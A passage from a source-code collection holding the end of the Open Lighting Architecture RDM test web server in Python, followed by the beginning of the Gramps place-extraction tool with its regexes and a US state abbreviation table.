return self.MakeSyncClientCall(self._client.RunRDMDiscovery, *args)
def MakeSyncClientCall(self, method, *method_args):
"""Turns an async call into a sync (blocking one).
Args:
wrapper: the ClientWrapper object
method: the method to call
*method_args: Any arguments to pass to the method
Returns:
The arguments that would have been passed to the callback function.
"""
global args_result
event = Event()
def Callback(*args, **kwargs):
global args_result
args_result = args
event.set()
def RunMethod():
method(*method_args, callback=Callback)
self._ss.Execute(RunMethod)
event.wait()
return args_result
class RDMTestThread(Thread):
"""The RDMResponder tests are closely coupled to the Wrapper (yuck!). So we
need to run this all in a separate thread. This is all a bit of a hack and
you'll get into trouble if multiple things are running at once...
"""
RUNNING, COMPLETED, ERROR = range(3)
TESTS, COLLECTOR = range(2)
def __init__(self, pid_store, logs_directory):
super(RDMTestThread, self).__init__()
self._pid_store = pid_store
self._logs_directory = logs_directory
self._terminate = False
self._request = None
# guards _terminate and _request
self._cv = Condition()
self._wrapper = None
self._test_state_lock = Lock() # guards _test_state
self._test_state = {}
def Stop(self):
self._cv.acquire()
self._terminate = True
self._cv.notify()
self._cv.release()
def ScheduleTests(self, universe, uid, test_filter, broadcast_write_delay,
dmx_frame_rate, slot_count):
"""Schedule the tests to be run. Callable from any thread. Callbable by any
thread.
Returns:
An error message, or None if the tests were scheduled.
"""
if not self._CheckIfConnected():
return 'Lost connection to OLAD'
self._cv.acquire()
if self._request is not None:
self._cv.release()
return 'Existing request pending'
self._request = lambda : self._RunTests(universe, uid, test_filter,
broadcast_write_delay,
dmx_frame_rate, slot_count)
self._cv.notify()
self._cv.release()
return None
def ScheduleCollector(self, universe, skip_queued_messages):
"""Schedule the collector to run on a universe. Callable by any thread.
Returns:
An error message, or None if the collection was scheduled.
"""
if not self._CheckIfConnected():
return 'Lost connection to OLAD'
self._cv.acquire()
if self._request is not None:
self._cv.release()
return 'Existing request pending'
self._request = lambda : self._RunCollector(universe, skip_queued_messages)
self._cv.notify()
self._cv.release()
return None
def Stat(self):
"""Check the state of the tests. Callable by any thread.
Returns:
The status of the tests.
"""
self._test_state_lock.acquire()
state = dict(self._test_state)
self._test_state_lock.release()
return state
def run(self):
self._wrapper = ClientWrapper()
self._collector = ModelCollector(self._wrapper, self._pid_store)
while True:
self._cv.acquire()
if self._terminate:
logging.info('quitting test thread')
self._cv.release()
return;
if self._request is not None:
request = self._request
self._request = None
self._cv.release()
request()
continue
# nothing to do, go into the wait
self._cv.wait()
self._cv.release()
def _UpdateStats(self, tests_completed, total_tests):
self._test_state_lock.acquire()
self._test_state['tests_completed'] = tests_completed
self._test_state['total_tests'] = total_tests
self._test_state_lock.release()
def _RunTests(self, universe, uid, test_filter, broadcast_write_delay,
dmx_frame_rate, slot_count):
self._test_state_lock.acquire()
self._test_state = {
'action': self.TESTS,
'tests_completed': 0,
'total_tests': None,
'state': self.RUNNING,
'duration': 0,
}
start_time = datetime.now()
self._test_state_lock.release()
runner = TestRunner.TestRunner(universe, uid, broadcast_write_delay,
self._pid_store, self._wrapper)
for test in TestRunner.GetTestClasses(TestDefinitions):
runner.RegisterTest(test)
dmx_sender = None
if dmx_frame_rate > 0 and slot_count > 0:
logging.info('Starting DMXServer with slot cout %d and fps of %d' %
(slot_count, dmx_frame_rate))
dmx_sender = DMXSender(self._wrapper, universe, dmx_frame_rate, slot_count)
try:
tests, unused_device = runner.RunTests(test_filter, False, self._UpdateStats)
except Exception as e:
self._test_state_lock.acquire()
self._test_state['state'] = self.ERROR
self._test_state['exception'] = str(e)
self._test_state['traceback'] = traceback.format_exc()
self._test_state_lock.release()
return
finally:
if dmx_sender is not None:
dmx_sender.Stop()
timestamp = int(time())
end_time = datetime.now()
test_parameters = {
'broadcast_write_delay': broadcast_write_delay,
'dmx_frame_rate': dmx_frame_rate,
'dmx_slot_count': slot_count,
}
log_saver = TestLogger.TestLogger(self._logs_directory)
logs_saved = True
try:
log_saver.SaveLog(uid, timestamp, tests, test_parameters)
except TestLoggerException:
logs_saved = False
self._test_state_lock.acquire()
# we can't use total_seconds() since it requires Python 2.7
time_delta = end_time - start_time
self._test_state['duration'] = (
time_delta.seconds + time_delta.days * 24 * 3600)
self._test_state['state'] = self.COMPLETED
self._test_state['tests'] = tests
self._test_state['logs_saved'] = logs_saved
self._test_state['timestamp'] = timestamp
self._test_state['uid'] = uid
self._test_state_lock.release()
def _RunCollector(self, universe, skip_queued_messages):
"""Run the device model collector for a universe."""
logging.info('Collecting for %d' % universe)
self._test_state_lock.acquire()
self._test_state = {
'action': self.COLLECTOR,
'state': self.RUNNING,
}
self._test_state_lock.release()
try:
output = self._collector.Run(universe, skip_queued_messages)
except Exception as e:
self._test_state_lock.acquire()
self._test_state['state'] = self.ERROR
self._test_state['exception'] = str(e)
self._test_state['traceback'] = traceback.format_exc()
self._test_state_lock.release()
return
self._test_state_lock.acquire()
self._test_state['state'] = self.COMPLETED
self._test_state['output'] = output
self._test_state_lock.release()
def _CheckIfConnected(self):
"""Check if the client is connected to olad.
Returns:
True if connected, False otherwise.
"""
# TODO(simon): add this check, remember it needs locking.
return True
class HTTPRequest(object):
"""Represents a HTTP Request."""
def __init__(self, environ):
self._environ = environ
self._params = None
def Path(self):
"""Return the path for the request."""
return self._environ['PATH_INFO']
def GetParam(self, param, default=None):
"""This only returns the first value for each param.
Args:
param: the name of the url parameter.
default: the value to return if the parameter wasn't supplied.
Returns:
The value of the url param, or None if it wasn't present.
"""
if self._params is None:
self._params = {}
get_params = urlparse.parse_qs(self._environ['QUERY_STRING'])
for p in get_params:
self._params[p] = get_params[p][0]
return self._params.get(param, default)
class HTTPResponse(object):
"""Represents a HTTP Response."""
OK = '200 OK'
ERROR = '500 Error'
DENIED = '403 Denied'
NOT_FOUND = '404 Not Found'
PERMANENT_REDIRECT = '301 Moved Permanently'
def __init__(self):
self._status = None
self._headers = {};
self._content_type = None
self._data = []
def SetStatus(self, status):
self._status = status
def GetStatus(self):
return self._status
def SetHeader(self, header, value):
self._headers[header] = value
def GetHeaders(self):
headers = []
for header, value in self._headers.iteritems():
headers.append((header, value))
return headers
def AppendData(self, data):
self._data.append(data)
def Data(self):
return self._data
class RequestHandler(object):
"""The base request handler class."""
def HandleRequest(self, request, response):
pass
class RedirectHandler(RequestHandler):
"""Serve a 301 redirect."""
def __init__(self, new_location):
self._new_location = new_location
def HandleRequest(self, request, response):
response.SetStatus(HTTPResponse.PERMANENT_REDIRECT)
response.SetHeader('Location', self._new_location)
class StaticFileHandler(RequestHandler):
"""A class which handles requests for static files."""
PREFIX = '/static/'
def __init__(self, static_dir):
self._static_dir = static_dir
def HandleRequest(self, request, response):
path = request.Path()
if not path.startswith(self.PREFIX):
response.SetStatus(HTTPResponse.NOT_FOUND)
return
# strip off /static
path = path[len(self.PREFIX):]
# This is important as it ensures we can't access arbitary files
filename = os.path.abspath(os.path.join(self._static_dir, path))
if (not filename.startswith(self._static_dir) or
not os.path.exists(filename) or
not os.path.isfile(filename)):
response.SetStatus(HTTPResponse.NOT_FOUND)
return
elif not os.access(filename, os.R_OK):
response.SetStatus(HTTPResponse.DENIED)
return
else:
mimetype, encoding = mimetypes.guess_type(filename)
if mimetype:
response.SetHeader('Content-type', mimetype)
if encoding:
response.SetHeader('Content-encoding', encoding)
stats = os.stat(filename)
response.SetStatus(HTTPResponse.OK)
response.SetHeader('Content-length', str(stats.st_size))
response.AppendData(open(filename, 'rb').read())
class JsonRequestHandler(RequestHandler):
"""A class which handles Json requests."""
def HandleRequest(self, request, response):
response.SetHeader('Cache-Control', 'no-cache')
response.SetHeader('Content-type', 'application/json')
try:
json_data = self.GetJson(request, response)
response.AppendData(json.dumps(json_data, sort_keys = True))
except ServerException as e:
# for json requests, rather than returning 500s we return the error as
# json
response.SetStatus(HTTPResponse.OK)
json_data = {
'status': False,
'error': str(e),
}
response.AppendData(json.dumps(json_data, sort_keys = True))
def RaiseExceptionIfMissing(self, request, param):
"""Helper method to raise an exception if the param is missing."""
value = request.GetParam(param)
if value is None:
raise ServerException('Missing parameter: %s' % param)
return value
def GetJson(self, request, response):
"""Subclasses implement this."""
pass
class OLAServerRequestHandler(JsonRequestHandler):
"""Catches OLADNotRunningException and handles them gracefully."""
def __init__(self, ola_thread):
self._thread = ola_thread;
def GetThread(self):
return self._thread
def HandleRequest(self, request, response):
try:
super(OLAServerRequestHandler, self).HandleRequest(request, response)
except OLADNotRunningException as e:
response.SetStatus(HTTPResponse.OK)
json_data = {
'status': False,
'error': 'The OLA Server instance is no longer running',
}
response.AppendData(json.dumps(json_data, sort_keys = True))
class TestDefinitionsHandler(JsonRequestHandler):
"""Return a JSON list of test definitions."""
def GetJson(self, request, response):
response.SetStatus(HTTPResponse.OK)
tests = [t.__name__ for t in TestRunner.GetTestClasses(TestDefinitions)]
return {
'test_defs': tests,
'status': True,
}
class GetUniversesHandler(OLAServerRequestHandler):
"""Return a JSON list of universes."""
def GetJson(self, request, response):
status, universes = self.GetThread().FetchUniverses()
if not status.Succeeded():
raise ServerException('Failed to fetch universes from server')
response.SetStatus(HTTPResponse.OK)
return {
'universes': [u.__dict__ for u in universes],
'status': True,
}
class GetDevicesHandler(OLAServerRequestHandler):
"""Return a JSON list of RDM devices."""
def GetJson(self, request, response):
universe_param = request.GetParam('u')
if universe_param is None:
raise ServerException('Missing universe parameter: u')
try:
universe = int(universe_param)
except ValueError:
raise ServerException('Invalid universe parameter: u')
status, uids = self.GetThread().FetchUIDList(universe)
if not status.Succeeded():
raise ServerException('Invalid universe ID!')
response.SetStatus(HTTPResponse.OK)
return {
'uids': [str(u) for u in uids],
'status': True,
}
class RunDiscoveryHandler(OLAServerRequestHandler):
"""Runs the RDM Discovery process."""
def GetJson(self, request, response):
universe_param = request.GetParam('u')
if universe_param is None:
raise ServerException('Missing universe parameter: u')
try:
universe = int(universe_param)
except ValueError:
raise ServerException('Invalid universe parameter: u')
status, uids = self.GetThread().RunRDMDiscovery(universe, True)
if not status.Succeeded():
raise ServerException('Invalid universe ID!')
response.SetStatus(HTTPResponse.OK)
return {
'uids': [str(u) for u in uids],
'status': True,
}
class DownloadResultsHandler(RequestHandler):
"""A class which handles requests to download test results."""
def HandleRequest(self, request, response):
uid_param = request.GetParam('uid') or ''
uid = UID.FromString(uid_param)
if uid is None:
raise ServerException('Missing uid parameter: uid')
timestamp = request.GetParam('timestamp')
if timestamp is None:
raise ServerException('Missing timestamp parameter: timestamp')
include_debug = request.GetParam('debug')
include_description = request.GetParam('description')
category = request.GetParam('category')
test_state = request.GetParam('state')
reader = TestLogger.TestLogger(settings['log_directory'])
try:
output = reader.ReadAndFormat(uid, timestamp, category,
test_state, include_debug,
include_description)
except TestLogger.TestLoggerException as e:
raise ServerException(e)
filename = ('%04x-%08x.%s.txt' %
(uid.manufacturer_id, uid.device_id, timestamp))
response.SetStatus(HTTPResponse.OK)
response.SetHeader('Content-disposition',
'attachment; filename="%s"' % filename)
response.SetHeader('Content-type', 'text/plain')
response.SetHeader('Content-length', '%d' % len(output))
response.AppendData(output)
class RunTestsHandler(OLAServerRequestHandler):
"""Run the RDM tests."""
def __init__(self, ola_thread, test_thread):
super(RunTestsHandler, self).__init__(ola_thread)
self._test_thread = test_thread
def GetJson(self, request, response):
"""Check if this is a RunTests or StatTests request."""
path = request.Path()
if path == '/RunTests':
return self.RunTests(request, response)
if path == '/RunCollector':
return self.RunCollector(request, response)
elif path == '/StatTests':
return self.StatTests(request, response)
elif path == '/StatCollector':
return self.StatCollector(request, response)
else:
logging.error('Got invalid request for %s' % path)
raise ServerException('Invalid request')
def StatTests(self, request, response):
"""Return the status of the running tests."""
response.SetStatus(HTTPResponse.OK)
status = self._test_thread.Stat()
if status is None:
return {}
json_data = {'status': True}
if status['state'] == RDMTestThread.COMPLETED:
json_data['UID'] = str(status['uid'])
json_data['duration'] = status['duration']
json_data['completed'] = True
json_data['logs_disabled'] = not status['logs_saved']
json_data['timestamp'] = status['timestamp'],
self._FormatTestResults(status['tests'], json_data)
elif status['state'] == RDMTestThread.ERROR:
json_data['completed'] = True
json_data['exception'] = status['exception']
json_data['traceback'] = status.get('traceback', '')
else:
json_data['completed'] = False
json_data['tests_completed'] = status['tests_completed']
json_data['total_tests'] = status['total_tests']
return json_data
def StatCollector(self, request, response):
"""Return the status of the running collector process."""
response.SetStatus(HTTPResponse.OK)
status = self._test_thread.Stat()
if status is None:
return {}
json_data = {'status': True}
if status['state'] == RDMTestThread.COMPLETED:
json_data['completed'] = True
json_data['output'] = pprint.pformat(status['output'])
elif status['state'] == RDMTestThread.ERROR:
json_data['completed'] = True
json_data['exception'] = status['exception']
json_data['traceback'] = status.get('traceback', '')
else:
json_data['completed'] = False
return json_data
def RunCollector(self, request, response):
"""Handle a /RunCollector request."""
universe = self._CheckValidUniverse(request)
skip_queued = request.GetParam('skip_queued')
if skip_queued is None or skip_queued.lower() == 'false':
skip_queued = False
else:
skip_queued = True
ret = self._test_thread.ScheduleCollector(universe, skip_queued)
if ret is not None:
raise ServerException(ret)
response.SetStatus(HTTPResponse.OK)
return {'status': True}
def RunTests(self, request, response):
"""Handle a /RunTests request."""
universe = self._CheckValidUniverse(request)
uid_param = self.RaiseExceptionIfMissing(request, 'uid')
uid = UID.FromString(uid_param)
if uid is None:
raise ServerException('Invalid uid: %s' % uid_param)
# the tests to run, None means all
test_filter = request.GetParam('t')
if test_filter is not None:
if test_filter == 'all':
test_filter = None
else:
test_filter = set(test_filter.split(','))
broadcast_write_delay = request.GetParam('w')
if broadcast_write_delay is None:
broadcast_write_delay = 0
try:
broadcast_write_delay = int(broadcast_write_delay)
except ValueError:
raise ServerException('Invalid broadcast write delay')
slot_count = request.GetParam('c')
if slot_count is None:
slot_count = 0
try:
slot_count = int(slot_count)
except ValueError:
raise ServerException('Invalid slot count')
if slot_count not in range(1, 513):
raise ServerException('Slot count not in range 0..512')
dmx_frame_rate = request.GetParam('f')
if dmx_frame_rate is None:
dmx_frame_rate = 0
try:
dmx_frame_rate = int(dmx_frame_rate)
except ValueError:
raise ServerException('Invalid DMX frame rate')
ret = self._test_thread.ScheduleTests(universe, uid, test_filter,
broadcast_write_delay,
dmx_frame_rate, slot_count)
if ret is not None:
raise ServerException(ret)
response.SetStatus(HTTPResponse.OK)
return {'status': True}
def _CheckValidUniverse(self, request):
"""Check that the universe paramter is present and refers to a valid
universe.
Args:
request: the HTTPRequest object.
Returns:
The santitized universe id.
Raises:
ServerException if the universe isn't valid or doesn't exist.
"""
universe_param = self.RaiseExceptionIfMissing(request, 'u')
try:
universe = int(universe_param)
except ValueError:
raise ServerException('Invalid universe parameter: u')
status, universes = self.GetThread().FetchUniverses()
if not status.Succeeded():
raise ServerException('Failed to fetch universes from server')
if universe not in [u.id for u in universes]:
raise ServerException("Universe %d doesn't exist" % universe)
return universe
def _FormatTestResults(self, tests, json_data):
results = []
stats_by_catg = {}
passed = 0
failed = 0
broken = 0
not_run = 0
for test in tests:
state = test.state.__str__()
category = test.category.__str__()
stats_by_catg.setdefault(category, {'passed': 0, 'total': 0})
if test.state == TestState.PASSED:
passed += 1
stats_by_catg[category]['passed'] += 1
stats_by_catg[category]['total'] += 1
elif test.state == TestState.FAILED:
failed += 1
stats_by_catg[category]['total'] += 1
elif test.state == TestState.BROKEN:
broken += 1
stats_by_catg[category]['total'] += 1
elif test.state == TestState.NOT_RUN:
not_run += 1
results.append({
'definition': test.__str__(),
'state': state,
'category': category,
'warnings': [cgi.escape(w) for w in test.warnings],
'advisories': [cgi.escape(a) for a in test.advisories],
'debug': [cgi.escape(d) for d in test._debug],
'doc': cgi.escape(test.__doc__),
}
)
stats = {
'total': len(tests),
'passed': passed,
'failed': failed,
'broken': broken,
'not_run': not_run,
}
json_data.update({
'test_results': results,
'stats': stats,
'stats_by_catg': stats_by_catg,
})
class Application(object):
"""Creates a new Application."""
def __init__(self):
# dict of path to handler
self._handlers = {}
self._regex_handlers = []
def RegisterHandler(self, path, handler):
self._handlers[path] = handler
def RegisterRegex(self, path_regex, handler):
self._regex_handlers.append((path_regex, handler))
def HandleRequest(self, environ, start_response):
"""Create a new TestServerApplication, passing in the OLA Wrapper."""
request = HTTPRequest(environ)
response = HTTPResponse()
self.DispatchRequest(request, response)
start_response(response.GetStatus(), response.GetHeaders())
return response.Data()
def DispatchRequest(self, request, response):
path = request.Path()
if path in self._handlers:
self._handlers[path](request, response)
return
else:
for pattern, handler in self._regex_handlers:
if re.match(pattern, path):
handler(request, response)
return
response.SetStatus(HTTPResponse.NOT_FOUND)
def BuildApplication(ola_thread, test_thread):
"""Construct the application and add the handlers."""
app = Application()
app.RegisterHandler('/',
RedirectHandler('/static/rdmtests.html').HandleRequest)
app.RegisterHandler('/favicon.ico',
RedirectHandler('/static/images/favicon.ico').HandleRequest)
app.RegisterHandler('/GetTestDefs',
TestDefinitionsHandler().HandleRequest)
app.RegisterHandler('/GetUnivInfo',
GetUniversesHandler(ola_thread).HandleRequest)
app.RegisterHandler('/GetDevices',
GetDevicesHandler(ola_thread).HandleRequest)
app.RegisterHandler('/RunDiscovery',
RunDiscoveryHandler(ola_thread).HandleRequest)
app.RegisterHandler('/DownloadResults',
DownloadResultsHandler().HandleRequest)
run_tests_handler = RunTestsHandler(ola_thread, test_thread)
app.RegisterHandler('/RunCollector', run_tests_handler.HandleRequest)
app.RegisterHandler('/RunTests', run_tests_handler.HandleRequest)
app.RegisterHandler('/StatCollector', run_tests_handler.HandleRequest)
app.RegisterHandler('/StatTests', run_tests_handler.HandleRequest)
app.RegisterRegex('/static/.*',
StaticFileHandler(settings['www_dir']).HandleRequest)
return app
def parse_options():
"""
Parse Command Line options
"""
usage = 'Usage: %prog [options]'
description = textwrap.dedent("""\
Starts the TestServer (A simple Web Server) which run a series of tests on
a RDM responder and displays the results in a Web UI.
This requires the OLA server to be running, and the RDM device to have been
detected. You can confirm this by running ola_rdm_discover -u
UNIVERSE. This will send SET commands to the broadcast UIDs which means
the start address, device label etc. will be changed for all devices
connected to the responder. Think twice about running this on your
production lighting rig.
""")
parser = OptionParser(usage, description=description)
parser.add_option('-p', '--pid_store', metavar='FILE',
help='The file to load the PID definitions from.')
parser.add_option('-d', '--www_dir', default=DataLocation.location,
help='The root directory to serve static files.')
parser.add_option('-l', '--log_directory',
default=os.path.abspath('/tmp/ola-rdm-logs'),
help='The directory to store log files.')
parser.add_option('--world_writeable',
action="store_true",
help='Make the log directory world writeable.')
options, args = parser.parse_args()
return options
def SetupLogDirectory(options):
"""Setup the log dir."""
# Setup the log dir, or display an error
log_directory = options.log_directory
if not os.path.exists(log_directory):
try:
os.makedirs(log_directory)
if options.world_writeable:
stat_result = os.stat(log_directory)
os.chmod(log_directory, stat_result.st_mode | stat.S_IWOTH)
except OSError:
logging.error(
'Failed to create %s for RDM logs. Logging will be disabled.' %
options.log_directory)
elif not os.path.isdir(options.log_directory):
logging.error('Log directory invalid: %s. Logging will be disabled.' %
options.log_directory)
elif not os.access(options.log_directory, os.W_OK):
logging.error(
'Unable to write to log directory: %s. Logging will be disabled.' %
options.log_directory)
def main():
options = parse_options()
settings.update(options.__dict__)
pid_store = PidStore.GetStore(options.pid_store, ('pids.proto'))
logging.basicConfig(level=logging.INFO, format='%(message)s')
SetupLogDirectory(options)
#Check olad status
logging.info('Checking olad status')
try:
ola_client = OlaClient()
except OLADNotRunningException:
logging.error('Error creating connection with olad. Is it running?')
sys.exit(127)
ola_thread = OLAThread(ola_client)
ola_thread.start()
test_thread = RDMTestThread(pid_store, settings['log_directory'])
test_thread.start()
app = BuildApplication(ola_thread, test_thread)
httpd = make_server('', settings['PORT'], app.HandleRequest)
logging.info('Running RDM Tests Server on %s:%s' %
('127.0.0.1', httpd.server_port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
ola_thread.Stop()
test_thread.Stop()
ola_thread.join()
test_thread.join()
if __name__ == '__main__':
main()
| lgpl-2.1 | -8,669,926,433,961,221,000 | 30.512742 | 83 | 0.659604 | false |
arunkgupta/gramps | gramps/plugins/tool/extractcity.py | 1 | 26002 | # -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2010 Jakim Friant
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""Tools/Database Processing/Extract Place Data from a Place Title"""
#-------------------------------------------------------------------------
#
# python modules
#
#-------------------------------------------------------------------------
import re
from gramps.gen.ggettext import gettext as _
#-------------------------------------------------------------------------
#
# gnome/gtk
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
from gi.repository import GObject
#-------------------------------------------------------------------------
#
# gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.db import DbTxn
from gramps.gui.managedwindow import ManagedWindow
from gramps.gui.display import display_help
from gramps.gui.plug import tool
from gramps.gui.utils import ProgressMeter
from gramps.gui.glade import Glade
CITY_STATE_ZIP = re.compile("((\w|\s)+)\s*,\s*((\w|\s)+)\s*(,\s*((\d|-)+))", re.UNICODE)
CITY_STATE = re.compile("((?:\w|\s)+(?:-(?:\w|\s)+)*),((?:\w|\s)+)", re.UNICODE)
CITY_LAEN = re.compile("((?:\w|\s)+(?:-(?:\w|\s)+)*)\(((?:\w|\s)+)", re.UNICODE)
STATE_ZIP = re.compile("(.+)\s+([\d-]+)", re.UNICODE)
COUNTRY = ( _(u"United States of America"), _(u"Canada"), _(u"France"),_(u"Sweden"))
STATE_MAP = {
u"AL" : (u"Alabama", 0),
u"AL." : (u"Alabama", 0),
u"ALABAMA" : (u"Alabama", 0),
u"AK" : (u"Alaska" , 0),
u"AK." : (u"Alaska" , 0),
u"ALASKA" : (u"Alaska" , 0),
u"AS" : (u"American Samoa", 0),
u"AS." : (u"American Samoa", 0),
u"AMERICAN SAMOA": (u"American Samoa", 0),
u"AZ" : (u"Arizona", 0),
u"AZ." : (u"Arizona", 0),
u"ARIZONA" : (u"Arizona", 0),
u"AR" : (u"Arkansas" , 0),
u"AR." : (u"Arkansas" , 0),
u"ARKANSAS" : (u"Arkansas" , 0),
u"ARK." : (u"Arkansas" , 0),
u"ARK" : (u"Arkansas" , 0),
u"CA" : (u"California" , 0),
u"CA." : (u"California" , 0),
u"CALIFORNIA" : (u"California" , 0),
u"CO" : (u"Colorado" , 0),
u"COLO" : (u"Colorado" , 0),
u"COLO." : (u"Colorado" , 0),
u"COLORADO" : (u"Colorado" , 0),
u"CT" : (u"Connecticut" , 0),
u"CT." : (u"Connecticut" , 0),
u"CONNECTICUT" : (u"Connecticut" , 0),
u"DE" : (u"Delaware" , 0),
u"DE." : (u"Delaware" , 0),
u"DELAWARE" : (u"Delaware" , 0),
u"DC" : (u"District of Columbia" , 0),
u"D.C." : (u"District of Columbia" , 0),
u"DC." : (u"District of Columbia" , 0),
u"DISTRICT OF COLUMBIA" : (u"District of Columbia" , 0),
u"FL" : (u"Florida" , 0),
u"FL." : (u"Florida" , 0),
u"FLA" : (u"Florida" , 0),
u"FLA." : (u"Florida" , 0),
u"FLORIDA" : (u"Florida" , 0),
u"GA" : (u"Georgia" , 0),
u"GA." : (u"Georgia" , 0),
u"GEORGIA" : (u"Georgia" , 0),
u"GU" : (u"Guam" , 0),
u"GU." : (u"Guam" , 0),
u"GUAM" : (u"Guam" , 0),
u"HI" : (u"Hawaii" , 0),
u"HI." : (u"Hawaii" , 0),
u"HAWAII" : (u"Hawaii" , 0),
u"ID" : (u"Idaho" , 0),
u"ID." : (u"Idaho" , 0),
u"IDAHO" : (u"Idaho" , 0),
u"IL" : (u"Illinois" , 0),
u"IL." : (u"Illinois" , 0),
u"ILLINOIS" : (u"Illinois" , 0),
u"ILL" : (u"Illinois" , 0),
u"ILL." : (u"Illinois" , 0),
u"ILLS" : (u"Illinois" , 0),
u"ILLS." : (u"Illinois" , 0),
u"IN" : (u"Indiana" , 0),
u"IN." : (u"Indiana" , 0),
u"INDIANA" : (u"Indiana" , 0),
u"IA" : (u"Iowa" , 0),
u"IA." : (u"Iowa" , 0),
u"IOWA" : (u"Iowa" , 0),
u"KS" : (u"Kansas" , 0),
u"KS." : (u"Kansas" , 0),
u"KANSAS" : (u"Kansas" , 0),
u"KY" : (u"Kentucky" , 0),
u"KY." : (u"Kentucky" , 0),
u"KENTUCKY" : (u"Kentucky" , 0),
u"LA" : (u"Louisiana" , 0),
u"LA." : (u"Louisiana" , 0),
u"LOUISIANA" : (u"Louisiana" , 0),
u"ME" : (u"Maine" , 0),
u"ME." : (u"Maine" , 0),
u"MAINE" : (u"Maine" , 0),
u"MD" : (u"Maryland" , 0),
u"MD." : (u"Maryland" , 0),
u"MARYLAND" : (u"Maryland" , 0),
u"MA" : (u"Massachusetts" , 0),
u"MA." : (u"Massachusetts" , 0),
u"MASSACHUSETTS" : (u"Massachusetts" , 0),
u"MI" : (u"Michigan" , 0),
u"MI." : (u"Michigan" , 0),
u"MICH." : (u"Michigan" , 0),
u"MICH" : (u"Michigan" , 0),
u"MN" : (u"Minnesota" , 0),
u"MN." : (u"Minnesota" , 0),
u"MINNESOTA" : (u"Minnesota" , 0),
u"MS" : (u"Mississippi" , 0),
u"MS." : (u"Mississippi" , 0),
u"MISSISSIPPI" : (u"Mississippi" , 0),
u"MO" : (u"Missouri" , 0),
u"MO." : (u"Missouri" , 0),
u"MISSOURI" : (u"Missouri" , 0),
u"MT" : (u"Montana" , 0),
u"MT." : (u"Montana" , 0),
u"MONTANA" : (u"Montana" , 0),
u"NE" : (u"Nebraska" , 0),
u"NE." : (u"Nebraska" , 0),
u"NEBRASKA" : (u"Nebraska" , 0),
u"NV" : (u"Nevada" , 0),
u"NV." : (u"Nevada" , 0),
u"NEVADA" : (u"Nevada" , 0),
u"NH" : (u"New Hampshire" , 0),
u"NH." : (u"New Hampshire" , 0),
u"N.H." : (u"New Hampshire" , 0),
u"NEW HAMPSHIRE" : (u"New Hampshire" , 0),
u"NJ" : (u"New Jersey" , 0),
u"NJ." : (u"New Jersey" , 0),
u"N.J." : (u"New Jersey" , 0),
u"NEW JERSEY" : (u"New Jersey" , 0),
u"NM" : (u"New Mexico" , 0),
u"NM." : (u"New Mexico" , 0),
u"NEW MEXICO" : (u"New Mexico" , 0),
u"NY" : (u"New York" , 0),
u"N.Y." : (u"New York" , 0),
u"NY." : (u"New York" , 0),
u"NEW YORK" : (u"New York" , 0),
u"NC" : (u"North Carolina" , 0),
u"NC." : (u"North Carolina" , 0),
u"N.C." : (u"North Carolina" , 0),
u"NORTH CAROLINA": (u"North Carolina" , 0),
u"ND" : (u"North Dakota" , 0),
u"ND." : (u"North Dakota" , 0),
u"N.D." : (u"North Dakota" , 0),
u"NORTH DAKOTA" : (u"North Dakota" , 0),
u"OH" : (u"Ohio" , 0),
u"OH." : (u"Ohio" , 0),
u"OHIO" : (u"Ohio" , 0),
u"OK" : (u"Oklahoma" , 0),
u"OKLA" : (u"Oklahoma" , 0),
u"OKLA." : (u"Oklahoma" , 0),
u"OK." : (u"Oklahoma" , 0),
u"OKLAHOMA" : (u"Oklahoma" , 0),
u"OR" : (u"Oregon" , 0),
u"OR." : (u"Oregon" , 0),
u"OREGON" : (u"Oregon" , 0),
u"PA" : (u"Pennsylvania" , 0),
u"PA." : (u"Pennsylvania" , 0),
u"PENNSYLVANIA" : (u"Pennsylvania" , 0),
u"PR" : (u"Puerto Rico" , 0),
u"PUERTO RICO" : (u"Puerto Rico" , 0),
u"RI" : (u"Rhode Island" , 0),
u"RI." : (u"Rhode Island" , 0),
u"R.I." : (u"Rhode Island" , 0),
u"RHODE ISLAND" : (u"Rhode Island" , 0),
u"SC" : (u"South Carolina" , 0),
u"SC." : (u"South Carolina" , 0),
u"S.C." : (u"South Carolina" , 0),
u"SOUTH CAROLINA": (u"South Carolina" , 0),
u"SD" : (u"South Dakota" , 0),
u"SD." : (u"South Dakota" , 0),
u"S.D." : (u"South Dakota" , 0),
u"SOUTH DAKOTA" : (u"South Dakota" , 0),
u"TN" : (u"Tennessee" , 0),
u"TN." : (u"Tennessee" , 0),
u"TENNESSEE" : (u"Tennessee" , 0),
u"TENN." : (u"Tennessee" , 0),
u"TENN" : (u"Tennessee" , 0),
u"TX" : (u"Texas" , 0),
u"TX." : (u"Texas" , 0),
u"TEXAS" : (u"Texas" , 0),
u"UT" : (u"Utah" , 0),
u"UT." : (u"Utah" , 0),
u"UTAH" : (u"Utah" , 0),
u"VT" : (u"Vermont" , 0),
u"VT." : (u"Vermont" , 0),
u"VERMONT" : (u"Vermont" , 0),
u"VI" : (u"Virgin Islands" , 0),
u"VIRGIN ISLANDS": (u"Virgin Islands" , 0),
u"VA" : (u"Virginia" , 0),
u"VA." : (u"Virginia" , 0),
u"VIRGINIA" : (u"Virginia" , 0),
u"WA" : (u"Washington" , 0),
u"WA." : (u"Washington" , 0),
u"WASHINGTON" : (u"Washington" , 0),
u"WV" : (u"West Virginia" , 0),
u"WV." : (u"West Virginia" , 0),
u"W.V." : (u"West Virginia" , 0),
u"WEST VIRGINIA" : (u"West Virginia" , 0),
u"WI" : (u"Wisconsin" , 0),
u"WI." : (u"Wisconsin" , 0),
u"WISCONSIN" : (u"Wisconsin" , 0),
u"WY" : (u"Wyoming" , 0),
u"WY." : (u"Wyoming" , 0),
u"WYOMING" : (u"Wyoming" , 0),
u"AB" : (u"Alberta", 1),
